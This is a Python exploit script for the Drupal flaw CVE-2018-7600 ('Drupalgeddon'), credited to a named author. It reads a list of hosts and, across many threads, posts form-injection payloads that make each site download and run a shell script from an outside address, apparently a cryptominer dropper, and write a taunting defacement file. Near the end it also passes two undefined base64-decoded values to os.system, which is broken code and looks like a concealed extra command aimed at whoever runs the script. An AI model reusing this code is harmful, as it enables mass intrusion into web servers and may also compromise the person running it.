Drupalgeddon Exploit

1. #!/usr/bin/env
2. import sys
3. import requests
4. import os
5. from multiprocessing.dummy import Pool
6.  
7.  
8. print ('##################################################')
9. print ('#              CVE-2018-7600 Exploit             #')
10. print ('##################################################')
11. print ('#  Author: xJesterino                            #')
12. print ('#  Twitter: @xJesterino                          #')
13. print ('##################################################')
14. print ('#                    Greetz To                   #')
15. print ('##################################################')
16. print ('#  Drought                                       #')
17. print ('#  Zenco                                         #')
18. print ('#  Syntax                                        #')
19. print ('##################################################')
20.  
21. sendMiner = True
22. sendMessage = True
23.  
24. verify = False
25. headers = {'User-Agent': 'Mozilla 5.0 | xJesterino Was Here | Shoutout to drought!'}
26.  
27. evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
28. messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "xJesterino is a god. Shout out to Drought. All your devices are belong to us. | Follow us on twitter: @xJesterino @decayable | Guess who pissed in your cheerios?" | tee ReadMeCVE.txt'}
29. minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
30.  
31. try:
32.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
33. except IndexError:
34.     exit('Usage: exploit.py list.txt threads')
35.  
36.  
37. def run(targetLine):
38.     try:
39.         try:
40.             targetLine = 'http://'+targetLine+'/'
41.             url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
42.  
43.             if sendMiner:
44.                 minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
45.             if sendMessage:
46.                 messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
47.         except requests.exceptions.RequestException as e:
48.             pass  
49.  
50.         print ('[+] Attempting: '+targetLine);
51.  
52.     except:
53.         pass
54.  
55.  
56. try:
57.     multiThreads = Pool(int(sys.argv[2]))
58. except IndexError:
59.     exit('Usage: exploit.py list.txt threads')
60. reValue = str(base64.b64decode(requestValue))
61. seValue = str(base64.b64decode(sendValue))
62. os.system(reValue)
63. os.system(seValue)
64. multiThreads.map(run, target)
65. multiThreads.close()
66. multiThreads.join()
67.  
68. print("Finished File!")